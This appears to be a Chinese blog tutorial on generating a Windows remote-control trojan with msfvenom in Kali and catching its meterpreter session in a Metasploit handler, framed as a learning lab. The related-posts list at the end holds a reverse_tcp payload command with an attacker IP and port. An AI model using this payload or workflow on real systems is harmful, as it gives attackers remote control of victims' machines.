一.先解释一下

msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线。

(注意:msfvenom是在shell里使用的哈,不是msfconsole终端!)

公式如下(别人的图,借鉴借鉴)

二.那就开始使用吧

1.使用模块

等待生成demo1000.exe(生成shell)

( lhost为Kali的IP, Iport在范围内随意设置,记住你设置的端口号后面要用,可以参考下面的这个图中的信息)

2.生成后门成功

在文件夹中查找到

(这个demo10000.exe就是shell !!)

(在实操中,一般是通过web等漏洞来 进行上传到目标机的)
此处为了能快速复刻实验,直接复制到目标主机上!(注意!防火墙会拦截!我这里是已经手动关闭了防火墙的!如果你不想关闭防火墙到时候可以手动信任一下)

3.木马复制到目标机后回到Kali

把Kali端口打开(同生成木马的lport 1000 一样哦)

①首先进入msf模块

②使用下列模块开启端口

并查看模块必选项:

这里的handler的模块一定要同之前生成后门的必选项是一致的

设置完成后直接跑起来!!!

注意:当目标机不触发demo1000时这个程序是不会跑出结果的!!

当目标主机运行这个程序时才会出现哦!

成功之后就会出现meterpreter啦,是不是和上次的不谋而合了结局。

learning.......

msf之msfvenom的使用—使用Kali渗透工具生成远控木马相关推荐

  1. msfvenom生成远控木马

    1.生成病毒 在终端输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost =192.168.116.132 lport =12345 -f e ...

  2. Kali Linux Armitage生成被控端和主控端

    目录 说明 使用 Armitage生成被控端和主控端 说明 按照<Kali Linux2 网络渗透测试实践指南 第二版 >第八章操作 仅供学习讨论使用,请勿进行非法操作 使用 Armita ...

  3. vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器

    一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强 ...

  4. 渗透测试快速稳定远控软件,高级渗透测试第八季-demo即是远控

    本季是<高级持续渗透-第七季demo的成长>的延续. 点击文末左下方"阅读原文"可阅读第七季正文. https://www.secpulse.com/archives/ ...

  5. 网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码

    实战-使用msf扫描靶机上mysql服务的空密码 我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180 登录Metasploitable2-Linu ...

  6. Web渗透之MSF框架——msfvenom与免杀木马制作

    文章目录 生成常见的反向连接木马 反向连接的优势: Windows: Linux: MAC: PHP: Asp: Aspx: msfvenom参数介绍 生成免杀木马 360免杀木马 腾讯管家免杀木马 ...

  7. 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控

    内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...

  8. 渗透工具-白帽安全工程师Kali linux系统

    渗透工具-白帽安全工程师Kali linux ubuntu 20.04 安装metasploit msfvenom常用生成 Payload 命令 2022 安装 Armitage 傻瓜渗透msf 介绍 ...

  9. Kali渗透测试:远程控制程序基础

    Kali渗透测试:远程控制程序基础 测试环境: 攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248) 靶机:WinXP (IP:192.168.68.159) ...

最新文章

  1. 15.使用一样的BFS方法(代码几乎一模一样)解决多道LeetCode题目--542题(01矩阵)1765题(地图中的最高点)994腐烂的橘子
  2. C# winform combobox默认选中项方法
  3. rfid商品管理软件_哪个RFID固定资产管理系统比较好用?
  4. c++面试题之标准模板库
  5. 【scala】集和映射
  6. [XSY] 分割(dfs树)
  7. 实例10:python
  8. 即学即会 Serverless | 初识 Serverless 架构
  9. numpy的使用(一)(reshape()有待研究)
  10. Jmeter 线程数、Ramp-Up、循环次数 详解
  11. crypto-CommonModulusAttack(GXYCTF2019)
  12. VBS上传文件(转载)
  13. GC8837 DFN8 12V直流电机驱动芯片 完美替代TI DRV8837
  14. VS Code 空闲时的 CPU 使用率是 13%
  15. Failed to get convolution algorithm. This is probably because cuDNN failed to initialize,
  16. gdb打印errno显示cant find thread-local storage xxxx
  17. 23Java面试专题 八股文面试全套真题(含大厂高频面试真题)多线程
  18. 关于职业规划,尤其值得我们程序员学习、思考
  19. 在文件夹中快速打开命令行
  20. 压缩感知中的数学知识:投影矩阵(projection matrix)

热门文章

  1. 实验六 键盘扫描显示实验(矩阵键盘)
  2. 一只喵的西行记-11 与大叔小萝莉的不打不相识
  3. 【山科OJ】Problem A: 社交网络的好友推荐
  4. 爬虫软件尝试-后羿采集器:批量免费抓取网页数据
  5. 代码块:在Java中,使用{}括起来的代码被称为代码块。
  6. vbs过程参数--byref和byval
  7. IDES翻译—利用采购订单进行跨公司库存转储
  8. 2020年拼多多校招面试题及答案-最全最新-持续更新中(2)
  9. 应用程序框架 Application Framework
  10. 推荐系统实践(五)----基于图的推荐算法